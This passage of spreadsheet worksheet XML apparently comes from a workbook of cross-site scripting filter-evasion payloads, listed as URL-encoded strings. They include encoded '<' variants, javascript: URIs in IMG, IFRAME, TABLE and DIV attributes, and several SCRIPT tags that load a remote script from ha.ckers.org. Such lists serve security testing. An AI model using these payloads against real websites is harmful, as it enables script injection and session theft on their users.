      <c r="A913" s="3" t="s">
        <v>800</v>
      </c>
      <c r="B913" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt</v>
      </c>
    </row>
    <row r="914">
      <c r="A914" s="3" t="s">
        <v>798</v>
      </c>
      <c r="B914" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B</v>
      </c>
    </row>
    <row r="915">
      <c r="A915" s="3" t="s">
        <v>801</v>
      </c>
      <c r="B915" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26LT</v>
      </c>
    </row>
    <row r="916">
      <c r="A916" s="3" t="s">
        <v>802</v>
      </c>
      <c r="B916" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26LT%3B</v>
      </c>
    </row>
    <row r="917">
      <c r="A917" s="3" t="s">
        <v>803</v>
      </c>
      <c r="B917" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2360</v>
      </c>
    </row>
    <row r="918">
      <c r="A918" s="3" t="s">
        <v>804</v>
      </c>
      <c r="B918" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23060</v>
      </c>
    </row>
    <row r="919">
      <c r="A919" s="3" t="s">
        <v>805</v>
      </c>
      <c r="B919" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%230060</v>
      </c>
    </row>
    <row r="920">
      <c r="A920" s="3" t="s">
        <v>806</v>
      </c>
      <c r="B920" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2300060</v>
      </c>
    </row>
    <row r="921">
      <c r="A921" s="3" t="s">
        <v>807</v>
      </c>
      <c r="B921" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23000060</v>
      </c>
    </row>
    <row r="922">
      <c r="A922" s="3" t="s">
        <v>808</v>
      </c>
      <c r="B922" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%230000060</v>
      </c>
    </row>
    <row r="923">
      <c r="A923" s="3" t="s">
        <v>798</v>
      </c>
      <c r="B923" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B</v>
      </c>
    </row>
    <row r="924">
      <c r="A924" s="3" t="s">
        <v>809</v>
      </c>
      <c r="B924" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x3c</v>
      </c>
    </row>
    <row r="925">
      <c r="A925" s="3" t="s">
        <v>810</v>
      </c>
      <c r="B925" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x03c</v>
      </c>
    </row>
    <row r="926">
      <c r="A926" s="3" t="s">
        <v>811</v>
      </c>
      <c r="B926" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x003c</v>
      </c>
    </row>
    <row r="927">
      <c r="A927" s="3" t="s">
        <v>812</v>
      </c>
      <c r="B927" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x0003c</v>
      </c>
    </row>
    <row r="928">
      <c r="A928" s="3" t="s">
        <v>813</v>
      </c>
      <c r="B928" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x00003c</v>
      </c>
    </row>
    <row r="929">
      <c r="A929" s="3" t="s">
        <v>814</v>
      </c>
      <c r="B929" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x000003c</v>
      </c>
    </row>
    <row r="930">
      <c r="A930" s="3" t="s">
        <v>815</v>
      </c>
      <c r="B930" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x3c%3B</v>
      </c>
    </row>
    <row r="931">
      <c r="A931" s="3" t="s">
        <v>816</v>
      </c>
      <c r="B931" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x03c%3B</v>
      </c>
    </row>
    <row r="932">
      <c r="A932" s="3" t="s">
        <v>817</v>
      </c>
      <c r="B932" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x003c%3B</v>
      </c>
    </row>
    <row r="933">
      <c r="A933" s="3" t="s">
        <v>818</v>
      </c>
      <c r="B933" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x0003c%3B</v>
      </c>
    </row>
    <row r="934">
      <c r="A934" s="3" t="s">
        <v>819</v>
      </c>
      <c r="B934" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x00003c%3B</v>
      </c>
    </row>
    <row r="935">
      <c r="A935" s="3" t="s">
        <v>820</v>
      </c>
      <c r="B935" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x000003c%3B</v>
      </c>
    </row>
    <row r="936">
      <c r="A936" s="3" t="s">
        <v>821</v>
      </c>
      <c r="B936" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X3c</v>
      </c>
    </row>
    <row r="937">
      <c r="A937" s="3" t="s">
        <v>822</v>
      </c>
      <c r="B937" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X03c</v>
      </c>
    </row>
    <row r="938">
      <c r="A938" s="3" t="s">
        <v>823</v>
      </c>
      <c r="B938" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X003c</v>
      </c>
    </row>
    <row r="939">
      <c r="A939" s="3" t="s">
        <v>824</v>
      </c>
      <c r="B939" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X0003c</v>
      </c>
    </row>
    <row r="940">
      <c r="A940" s="3" t="s">
        <v>825</v>
      </c>
      <c r="B940" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X00003c</v>
      </c>
    </row>
    <row r="941">
      <c r="A941" s="3" t="s">
        <v>826</v>
      </c>
      <c r="B941" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X000003c</v>
      </c>
    </row>
    <row r="942">
      <c r="A942" s="3" t="s">
        <v>827</v>
      </c>
      <c r="B942" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X3c%3B</v>
      </c>
    </row>
    <row r="943">
      <c r="A943" s="3" t="s">
        <v>828</v>
      </c>
      <c r="B943" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X03c%3B</v>
      </c>
    </row>
    <row r="944">
      <c r="A944" s="3" t="s">
        <v>829</v>
      </c>
      <c r="B944" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X003c%3B</v>
      </c>
    </row>
    <row r="945">
      <c r="A945" s="3" t="s">
        <v>830</v>
      </c>
      <c r="B945" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X0003c%3B</v>
      </c>
    </row>
    <row r="946">
      <c r="A946" s="3" t="s">
        <v>831</v>
      </c>
      <c r="B946" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X00003c%3B</v>
      </c>
    </row>
    <row r="947">
      <c r="A947" s="3" t="s">
        <v>832</v>
      </c>
      <c r="B947" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X000003c%3B</v>
      </c>
    </row>
    <row r="948">
      <c r="A948" s="3" t="s">
        <v>833</v>
      </c>
      <c r="B948" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x3C</v>
      </c>
    </row>
    <row r="949">
      <c r="A949" s="3" t="s">
        <v>834</v>
      </c>
      <c r="B949" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x03C</v>
      </c>
    </row>
    <row r="950">
      <c r="A950" s="3" t="s">
        <v>835</v>
      </c>
      <c r="B950" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x003C</v>
      </c>
    </row>
    <row r="951">
      <c r="A951" s="3" t="s">
        <v>836</v>
      </c>
      <c r="B951" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x0003C</v>
      </c>
    </row>
    <row r="952">
      <c r="A952" s="3" t="s">
        <v>837</v>
      </c>
      <c r="B952" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x00003C</v>
      </c>
    </row>
    <row r="953">
      <c r="A953" s="3" t="s">
        <v>838</v>
      </c>
      <c r="B953" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x000003C</v>
      </c>
    </row>
    <row r="954">
      <c r="A954" s="3" t="s">
        <v>839</v>
      </c>
      <c r="B954" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x3C%3B</v>
      </c>
    </row>
    <row r="955">
      <c r="A955" s="3" t="s">
        <v>840</v>
      </c>
      <c r="B955" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x03C%3B</v>
      </c>
    </row>
    <row r="956">
      <c r="A956" s="3" t="s">
        <v>841</v>
      </c>
      <c r="B956" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x003C%3B</v>
      </c>
    </row>
    <row r="957">
      <c r="A957" s="3" t="s">
        <v>842</v>
      </c>
      <c r="B957" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x0003C%3B</v>
      </c>
    </row>
    <row r="958">
      <c r="A958" s="3" t="s">
        <v>843</v>
      </c>
      <c r="B958" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x00003C%3B</v>
      </c>
    </row>
    <row r="959">
      <c r="A959" s="3" t="s">
        <v>844</v>
      </c>
      <c r="B959" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23x000003C%3B</v>
      </c>
    </row>
    <row r="960">
      <c r="A960" s="3" t="s">
        <v>845</v>
      </c>
      <c r="B960" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X3C</v>
      </c>
    </row>
    <row r="961">
      <c r="A961" s="3" t="s">
        <v>846</v>
      </c>
      <c r="B961" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X03C</v>
      </c>
    </row>
    <row r="962">
      <c r="A962" s="3" t="s">
        <v>847</v>
      </c>
      <c r="B962" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X003C</v>
      </c>
    </row>
    <row r="963">
      <c r="A963" s="3" t="s">
        <v>848</v>
      </c>
      <c r="B963" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X0003C</v>
      </c>
    </row>
    <row r="964">
      <c r="A964" s="3" t="s">
        <v>849</v>
      </c>
      <c r="B964" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X00003C</v>
      </c>
    </row>
    <row r="965">
      <c r="A965" s="3" t="s">
        <v>850</v>
      </c>
      <c r="B965" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X000003C</v>
      </c>
    </row>
    <row r="966">
      <c r="A966" s="3" t="s">
        <v>851</v>
      </c>
      <c r="B966" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X3C%3B</v>
      </c>
    </row>
    <row r="967">
      <c r="A967" s="3" t="s">
        <v>852</v>
      </c>
      <c r="B967" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X03C%3B</v>
      </c>
    </row>
    <row r="968">
      <c r="A968" s="3" t="s">
        <v>853</v>
      </c>
      <c r="B968" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X003C%3B</v>
      </c>
    </row>
    <row r="969">
      <c r="A969" s="3" t="s">
        <v>854</v>
      </c>
      <c r="B969" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X0003C%3B</v>
      </c>
    </row>
    <row r="970">
      <c r="A970" s="3" t="s">
        <v>855</v>
      </c>
      <c r="B970" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X00003C%3B</v>
      </c>
    </row>
    <row r="971">
      <c r="A971" s="3" t="s">
        <v>856</v>
      </c>
      <c r="B971" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%23X000003C%3B</v>
      </c>
    </row>
    <row r="972">
      <c r="A972" s="3" t="s">
        <v>857</v>
      </c>
      <c r="B972" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5Cx3c</v>
      </c>
    </row>
    <row r="973">
      <c r="A973" s="3" t="s">
        <v>858</v>
      </c>
      <c r="B973" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5Cx3C</v>
      </c>
    </row>
    <row r="974">
      <c r="A974" s="3" t="s">
        <v>859</v>
      </c>
      <c r="B974" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5Cu003c</v>
      </c>
    </row>
    <row r="975">
      <c r="A975" s="3" t="s">
        <v>860</v>
      </c>
      <c r="B975" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5Cu003C</v>
      </c>
    </row>
    <row r="976">
      <c r="A976" s="3" t="s">
        <v>861</v>
      </c>
      <c r="B976" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3Biframe%20src%3Dhttp%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fscriptlet%26%2346%3Bhtml%26gt%3B</v>
      </c>
    </row>
    <row r="977">
      <c r="A977" s="3" t="s">
        <v>862</v>
      </c>
      <c r="B977" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%5C%22javascript%26%23058%3Balert%28%27XSS%27%29%5C%22</v>
      </c>
    </row>
    <row r="978">
      <c r="A978" s="3" t="s">
        <v>863</v>
      </c>
      <c r="B978" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20SRC%3D%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2F%26%2346%3Bjs%26gt%3B</v>
      </c>
    </row>
    <row r="979">
      <c r="A979" s="3" t="s">
        <v>864</v>
      </c>
      <c r="B979" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20SRC%3Dhttp%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxss%26%2346%3Bjs%3F%26lt%3BB%26gt%3B</v>
      </c>
    </row>
    <row r="980">
      <c r="A980" s="3" t="s">
        <v>865</v>
      </c>
      <c r="B980" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B%26lt%3BSCRIPT%26gt%3Balert%28%5C%22XSS%5C%22%29%3B%2F%2F%26lt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="981">
      <c r="A981" s="3" t="s">
        <v>866</v>
      </c>
      <c r="B981" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%2FSRC%3D%5C%22http%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxss%26%2346%3Bjs%5C%22%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="982">
      <c r="A982" s="3" t="s">
        <v>867</v>
      </c>
      <c r="B982" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BBODY%20onload%21%23%24%25%26%28%29%2A%7E%2B-_%26%2346%3B%2C%26%2358%3B%3B%3F%40%26%2391%3B%2F%7C%5C%26%2393%3B%5E%60%3Dalert%28%5C%22XSS%5C%22%29%26gt%3B</v>
      </c>
    </row>
    <row r="983">
      <c r="A983" s="3" t="s">
        <v>868</v>
      </c>
      <c r="B983" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%2FXSS%20SRC%3D%5C%22http%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxss%26%2346%3Bjs%5C%22%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="984">
      <c r="A984" s="3" t="s">
        <v>869</v>
      </c>
      <c r="B984" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%5C%22%20%20%20javascript%26%23058%3Balert%28%27XSS%27%29%3B%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="985">
      <c r="A985" s="3" t="s">
        <v>870</v>
      </c>
      <c r="B985" s="4" t="str">
        <f t="shared" si="1"/>
        <v>perl%20-e%20%27print%20%5C%22%26lt%3BSCR%5C0IPT%26gt%3Balert%28%5C%5C%22XSS%5C%5C%22%29%26lt%3B%2FSCR%5C0IPT%26gt%3B%5C%22%3B%27%20%26gt%3B%20out</v>
      </c>
    </row>
    <row r="986">
      <c r="A986" s="3" t="s">
        <v>871</v>
      </c>
      <c r="B986" s="4" t="str">
        <f t="shared" si="1"/>
        <v>perl%20-e%20%27print%20%5C%22%26lt%3BIMG%20SRC%3Djava%5C0script%26%23058%3Balert%28%5C%5C%22XSS%5C%5C%22%29%26gt%3B%5C%22%3B%27%20%26gt%3B%20out</v>
      </c>
    </row>
    <row r="987">
      <c r="A987" s="3" t="s">
        <v>872</v>
      </c>
      <c r="B987" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%5C%22jav%26%23x0D%3Bascript%26%23058%3Balert%28%27XSS%27%29%3B%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="988">
      <c r="A988" s="3" t="s">
        <v>873</v>
      </c>
      <c r="B988" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%5C%22jav%26%23x0A%3Bascript%26%23058%3Balert%28%27XSS%27%29%3B%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="989">
      <c r="A989" s="3" t="s">
        <v>874</v>
      </c>
      <c r="B989" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%5C%22jav%26%23x09%3Bascript%26%23058%3Balert%28%27XSS%27%29%3B%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="990">
      <c r="A990" s="3" t="s">
        <v>875</v>
      </c>
      <c r="B990" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%26gt%3B</v>
      </c>
    </row>
    <row r="991">
      <c r="A991" s="3" t="s">
        <v>876</v>
      </c>
      <c r="B991" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041%26gt%3B</v>
      </c>
    </row>
    <row r="992">
      <c r="A992" s="3" t="s">
        <v>877</v>
      </c>
      <c r="B992" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3Djavascript%26%23058%3Balert%28%27XSS%27%29%26gt%3B</v>
      </c>
    </row>
    <row r="993">
      <c r="A993" s="3" t="s">
        <v>878</v>
      </c>
      <c r="B993" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3Djavascript%26%23058%3Balert%28String%26%2346%3BfromCharCode%2888%2C83%2C83%29%29%26gt%3B</v>
      </c>
    </row>
    <row r="994">
      <c r="A994" s="3" t="s">
        <v>879</v>
      </c>
      <c r="B994" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20%5C%22%5C%22%5C%22%26gt%3B%26lt%3BSCRIPT%26gt%3Balert%28%5C%22XSS%5C%22%29%26lt%3B%2FSCRIPT%26gt%3B%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="995">
      <c r="A995" s="3" t="s">
        <v>880</v>
      </c>
      <c r="B995" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%60javascript%26%23058%3Balert%28%5C%22RSnake%20says%2C%20%27XSS%27%5C%22%29%60%26gt%3B</v>
      </c>
    </row>
    <row r="996">
      <c r="A996" s="3" t="s">
        <v>881</v>
      </c>
      <c r="B996" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3Djavascript%26%23058%3Balert%28%26quot%3BXSS%26quot%3B%29%26gt%3B</v>
      </c>
    </row>
    <row r="997">
      <c r="A997" s="3" t="s">
        <v>882</v>
      </c>
      <c r="B997" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3DJaVaScRiPt%26%23058%3Balert%28%27XSS%27%29%26gt%3B</v>
      </c>
    </row>
    <row r="998">
      <c r="A998" s="3" t="s">
        <v>877</v>
      </c>
      <c r="B998" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3Djavascript%26%23058%3Balert%28%27XSS%27%29%26gt%3B</v>
      </c>
    </row>
    <row r="999">
      <c r="A999" s="3" t="s">
        <v>883</v>
      </c>
      <c r="B999" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%5C%22javascript%26%23058%3Balert%28%27XSS%27%29%3B%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="1000">
      <c r="A1000" s="3" t="s">
        <v>884</v>
      </c>
      <c r="B1000" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20SRC%3Dhttp%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxss%26%2346%3Bjs%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="1001">
      <c r="A1001" s="5" t="s">
        <v>885</v>
      </c>
      <c r="B1001" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%27%3B%21--%5C%22%26lt%3BXSS%26gt%3B%3D%26%7B%28%29%7D</v>
      </c>
    </row>
    <row r="1002">
      <c r="A1002" s="5" t="s">
        <v>886</v>
      </c>
      <c r="B1002" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Balert%28String%26%2346%3BfromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String%26%2346%3BfromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String%26%2346%3BfromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%5C%22%3Balert%28String%26%2346%3BfromCharCode%2888%2C83%2C83%29%29%2F%2F--%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B%5C%22%26gt%3B%27%26gt%3B%26lt%3BSCRIPT%26gt%3Balert%28String%26%2346%3BfromCharCode%2888%2C83%2C83%29%29%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="1003">
      <c r="A1003" s="5" t="s">
        <v>887</v>
      </c>
      <c r="B1003" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1004">
      <c r="A1004" s="5" t="s">
        <v>462</v>
      </c>
      <c r="B1004" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D</v>
      </c>
    </row>
    <row r="1005">
      <c r="A1005" s="3" t="s">
        <v>463</v>
      </c>
      <c r="B1005" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1006">
      <c r="A1006" s="3" t="s">
        <v>464</v>
      </c>
      <c r="B1006" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1007">
      <c r="A1007" s="3" t="s">
        <v>465</v>
      </c>
      <c r="B1007" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28%27XSS%27%29%3E</v>
      </c>
    </row>
    <row r="1008">
      <c r="A1008" s="3" t="s">
        <v>888</v>
      </c>
      <c r="B1008" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascrscriptipt%3Aalert%28%27XSS%27%29%3E</v>
      </c>
    </row>
    <row r="1009">
      <c r="A1009" s="3" t="s">
        <v>466</v>
      </c>
      <c r="B1009" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3DJaVaScRiPt%3Aalert%28%27XSS%27%29%3E</v>
      </c>
    </row>
    <row r="1010">
      <c r="A1010" s="3" t="s">
        <v>471</v>
      </c>
      <c r="B1010" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E</v>
      </c>
    </row>
    <row r="1011">
      <c r="A1011" s="3" t="s">
        <v>484</v>
      </c>
      <c r="B1011" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22%20%26%2314%3B%20%20javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1012">
      <c r="A1012" s="3" t="s">
        <v>485</v>
      </c>
      <c r="B1012" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%2FXSS%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1013">
      <c r="A1013" s="3" t="s">
        <v>487</v>
      </c>
      <c r="B1013" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%2FSRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1014">
      <c r="A1014" s="3" t="s">
        <v>488</v>
      </c>
      <c r="B1014" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1015">
      <c r="A1015" s="3" t="s">
        <v>889</v>
      </c>
      <c r="B1015" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%3Ea%3D%2FXSS%2Falert%28a.source%29%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1016">
      <c r="A1016" s="3" t="s">
        <v>493</v>
      </c>
      <c r="B1016" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5C%22%3Balert%28%27XSS%27%29%3B%2F%2F</v>
      </c>
    </row>
    <row r="1017">
      <c r="A1017" s="3" t="s">
        <v>494</v>
      </c>
      <c r="B1017" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1018">
      <c r="A1018" s="3" t="s">
        <v>518</v>
      </c>
      <c r="B1018" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%C2%BCscript%C2%BEalert%28%C2%A2XSS%C2%A2%29%C2%BC%2Fscript%C2%BE</v>
      </c>
    </row>
    <row r="1019">
      <c r="A1019" s="3" t="s">
        <v>519</v>
      </c>
      <c r="B1019" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3Burl%3Djavascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1020">
      <c r="A1020" s="3" t="s">
        <v>522</v>
      </c>
      <c r="B1020" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E%3C%2FIFRAME%3E</v>
      </c>
    </row>
    <row r="1021">
      <c r="A1021" s="3" t="s">
        <v>524</v>
      </c>
      <c r="B1021" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CFRAMESET%3E%3CFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E%3C%2FFRAMESET%3E</v>
      </c>
    </row>
    <row r="1022">
      <c r="A1022" s="3" t="s">
        <v>525</v>
      </c>
      <c r="B1022" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CTABLE%20BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="1023">
      <c r="A1023" s="3" t="s">
        <v>526</v>
      </c>
      <c r="B1023" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CTABLE%3E%3CTD%20BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="1024">
      <c r="A1024" s="3" t="s">
        <v>527</v>
      </c>
      <c r="B1024" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22background-image%3A%20url%28javascript%3Aalert%28%27XSS%27%29%29%22%3E</v>
      </c>
    </row>
    <row r="1025">
      <c r="A1025" s="3" t="s">
        <v>528</v>
      </c>
      <c r="B1025" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22background-image%3A%5C0075%5C0072%5C006C%5C0028%27%5C006a%5C0061%5C0076%5C0061%5C0073%5C0063%5C0072%5C0069%5C0070%5C0074%5C003a%5C0061%5C006c%5C0065%5C0072%5C0074%5C0028.1027%5C0058.1053%5C0053%5C0027%5C0029%27%5C0029%22%3E</v>
      </c>
    </row>
    <row r="1026">
      <c r="A1026" s="3" t="s">
        <v>530</v>
      </c>
      <c r="B1026" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22width%3A%20expression%28alert%28%27XSS%27%29%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1027">
      <c r="A1027" s="3" t="s">
        <v>510</v>
      </c>
      <c r="B1027" s="4" t="str">
